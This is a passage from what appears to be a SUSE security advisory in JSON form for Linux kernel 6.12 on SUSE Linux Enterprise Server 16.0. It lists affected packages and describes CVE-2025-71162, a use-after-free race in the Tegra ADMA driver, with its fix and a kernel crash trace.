"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71157"
},
{
"cve": "CVE-2025-71162",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71162"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: tegra-adma: Fix use-after-free\n\nA use-after-free bug exists in the Tegra ADMA driver when audio streams\nare terminated, particularly during XRUN conditions. The issue occurs\nwhen the DMA buffer is freed by tegra_adma_terminate_all() before the\nvchan completion tasklet finishes accessing it.\n\nThe race condition follows this sequence:\n\n 1. DMA transfer completes, triggering an interrupt that schedules the\n completion tasklet (tasklet has not executed yet)\n 2. Audio playback stops, calling tegra_adma_terminate_all() which\n frees the DMA buffer memory via kfree()\n 3. The scheduled tasklet finally executes, calling vchan_complete()\n which attempts to access the already-freed memory\n\nSince tasklets can execute at any time after being scheduled, there is\nno guarantee that the buffer will remain valid when vchan_complete()\nruns.\n\nFix this by properly synchronizing the virtual channel completion:\n - Calling vchan_terminate_vdesc() in tegra_adma_stop() to mark the\n descriptors as terminated instead of freeing the descriptor.\n - Add the callback tegra_adma_synchronize() that calls\n vchan_synchronize() which kills any pending tasklets and frees any\n terminated descriptors.\n\nCrash logs:\n[ 337.427523] BUG: KASAN: use-after-free in vchan_complete+0x124/0x3b0\n[ 337.427544] Read of size 8 at addr ffff000132055428 by task swapper/0/0\n\n[ 337.427562] Call trace:\n[ 337.427564] dump_backtrace+0x0/0x320\n[ 337.427571] show_stack+0x20/0x30\n[ 337.427575] dump_stack_lvl+0x68/0x84\n[ 337.427584] print_address_description.constprop.0+0x74/0x2b8\n[ 337.427590] kasan_report+0x1f4/0x210\n[ 337.427598] __asan_load8+0xa0/0xd0\n[ 337.427603] vchan_complete+0x124/0x3b0\n[ 337.427609] tasklet_action_common.constprop.0+0x190/0x1d0\n[ 337.427617] tasklet_action+0x30/0x40\n[ 337.427623] __do_softirq+0x1a0/0x5c4\n[ 337.427628] irq_exit+0x110/0x140\n[ 337.427633] handle_domain_irq+0xa4/0xe0\n[ 337.427640] gic_handle_irq+0x64/0x160\n[ 337.427644] call_on_irq_stack+0x20/0x4c\n[ 337.427649] do_interrupt_handler+0x7c/0x90\n[ 337.427654] el1_interrupt+0x30/0x80\n[ 337.427659] el1h_64_irq_handler+0x18/0x30\n[ 337.427663] el1h_64_irq+0x7c/0x80\n[ 337.427667] cpuidle_enter_state+0xe4/0x540\n[ 337.427674] cpuidle_enter+0x54/0x80\n[ 337.427679] do_idle+0x2e0/0x380\n[ 337.427685] cpu_startup_entry+0x2c/0x70\n[ 337.427690] rest_init+0x114/0x130\n[ 337.427695] arch_call_rest_init+0x18/0x24\n[ 337.427702] start_kernel+0x380/0x3b4\n[ 337.427706] __primary_switched+0xc0/0xc8",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71162",
"url": "https://www.suse.com/security/cve/CVE-2025-71162"
},
{
"category": "external",
"summary": "SUSE Bug 1257204 for CVE-2025-71162",
"url": "https://bugzilla.suse.com/1257204"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
